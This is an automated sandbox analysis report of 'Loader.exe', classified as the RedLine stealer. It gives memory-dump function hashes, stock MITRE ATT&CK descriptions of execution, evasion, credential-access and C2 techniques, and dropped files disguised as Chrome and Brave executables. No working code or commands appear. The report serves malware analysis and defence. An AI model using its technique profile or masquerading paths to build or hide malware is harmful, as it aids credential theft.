Instruction ID: 7a88eeff1b337a01687d4c5391cdc21bfab5f01cc4ea0937b1c35553934c8bbe
Opcode Fuzzy Hash: e24ef868fa5fb6ba448d6c20888c0db452db6d344f672c1e013116fd892edad4
Instruction Fuzzy Hash: B4C08C700053408FEF18DF1884882293E60FF02329B310BCCA0388A2C2CBB6C943EBD1

Uniqueness

Uniqueness Score: -1.00%

Function 0AC22EEC Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69dde150e2ae1b08a44a8d179688429deaf7856cf3a44af46f79925668623228
Instruction ID: 0732079a790c3c984d938251be8b93ea7f52a2b1cbe80b5f47a0ca968a0343b0
Opcode Fuzzy Hash: 69dde150e2ae1b08a44a8d179688429deaf7856cf3a44af46f79925668623228
Instruction Fuzzy Hash: 19B0127E16C271B57516BB654840D2EA411FB61B04702DE69732950211CAAC9835F72F

Uniqueness

Uniqueness Score: -1.00%

Function 0AC2FD25 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 462f806103f530d795e63e7cd30240698a3559f3884ee21002b46cc62c982ebf
Instruction ID: dbc7bd5bdb141ea3f7f7066af70b0bdecb87d7fd9db8b395e95a14d244c0473c
Opcode Fuzzy Hash: 462f806103f530d795e63e7cd30240698a3559f3884ee21002b46cc62c982ebf
Instruction Fuzzy Hash: EFB09237A0411899EB109A89B4413EEFB30F790225F20402BC21066000C232017887D1

Uniqueness

Uniqueness Score: -1.00%

Function 0AC270D0 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07b3aa1be95291a8962d830b64d05366edccb8f00694dfedeaff5e4db1605f95
Instruction ID: 9e976ae12112bdc9322073e6fa5c4b8b22f81c6e3bb64a1cb8cb8c136189c186
Opcode Fuzzy Hash: 07b3aa1be95291a8962d830b64d05366edccb8f00694dfedeaff5e4db1605f95
Instruction Fuzzy Hash: 0AB012C17083805EE784273CF43574D050287F7601F4F4855E0C04938ADD0C44215303

Uniqueness

Uniqueness Score: -1.00%

Function 0AC26F46 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70d9cfb7e7d2c250ec39d1eed342d7b340ae5b4a8534d756bbe8dd3a41e14bba
Instruction ID: cdb8db48866067a4e6472cc34681b7f702fb17be4488edb97ae071cccb773326
Opcode Fuzzy Hash: 70d9cfb7e7d2c250ec39d1eed342d7b340ae5b4a8534d756bbe8dd3a41e14bba
Instruction Fuzzy Hash: 35C04C704006408FCF189F14E1482443E60AB51329B30428CD0684A2D2C776C543DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 0AC2343B Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fda185632458cc8550d478a9a374225320724c7aa44df9dfa5eea7c41cd53db
Instruction ID: ff928aebe8b0fce9fb9730301a139f7e694fb3f14e2bc9d78c3c5c8398251565
Opcode Fuzzy Hash: 8fda185632458cc8550d478a9a374225320724c7aa44df9dfa5eea7c41cd53db
Instruction Fuzzy Hash: F3A024451507D1D57307773040137C47700177130C3450010C10410013C0405037D55F

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0AC2C750 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12f40faa0f5ed0b91869b517a0ae877ca93235e700c7c7940adc5c74b21b1af3
Instruction ID: d8f4df910d7f9e6f7b39b565ca9407f5bbb84a94c1ac9489a5b50df6452abf4d
Opcode Fuzzy Hash: 12f40faa0f5ed0b91869b517a0ae877ca93235e700c7c7940adc5c74b21b1af3
Instruction Fuzzy Hash: 8A51EE70E06218DFDB08DFE9D454AEEBBB2AF89304F20812AD515BB354DB346946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0AC2C760 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29e1891d14a2bbe8d7e353d8c1f090a077d6e801f92caa167b9c4d438cb61e9e
Instruction ID: 2b41061fbc05d490b201ce4a45cfd52a9b8f19c6d149e03dc14a49f370e5e78a
Opcode Fuzzy Hash: 29e1891d14a2bbe8d7e353d8c1f090a077d6e801f92caa167b9c4d438cb61e9e
Instruction Fuzzy Hash: 4B51DB70E0521C9FDB08DFA9D494AEEBBF2AF89304F20812AD515BB394DB345946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0AC20928 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a33523e426518c160f87ee1e399c7b66a0128b6882ca1988be5d837caf9833c
Instruction ID: 6ea20be4a2dd9eda154f10db5453c44e4029ed4c1b8d20553b3ba6d3786dd898
Opcode Fuzzy Hash: 8a33523e426518c160f87ee1e399c7b66a0128b6882ca1988be5d837caf9833c
Instruction Fuzzy Hash: 6EE092B0CA722AEEFB24DF90C001BFEFA706B05228F115456840677A51C7748E44CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0AC2E234 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.461929003.000000000AC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750e9b554990e4def670e65452c4c1dd7f0df42386ffa9d7a2b1af8e0933b5c3
Instruction ID: d669765bcfa517a4ec41c063d55df4ecad49e2d98197cb5877da43991dbe4d1a
Opcode Fuzzy Hash: 750e9b554990e4def670e65452c4c1dd7f0df42386ffa9d7a2b1af8e0933b5c3
Instruction Fuzzy Hash: 80F0C974845229DAEB248F91D85D7BDBF71BF06309F116499D11773180CB740688CF84

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Loader.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Operating System Destruction

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Microsoft\brave.exe

C:\Users\user\AppData\Local\Microsoft\ofg.exe

C:\Users\user\AppData\Local\Microsoft\setup.exe

C:\Users\user\AppData\Local\Temp\3A08.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_035ejq30.2kl.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1hknxkl3.adj.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5parqzvs.iu3.psm1

Windows Analysis Report
Loader.exe

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre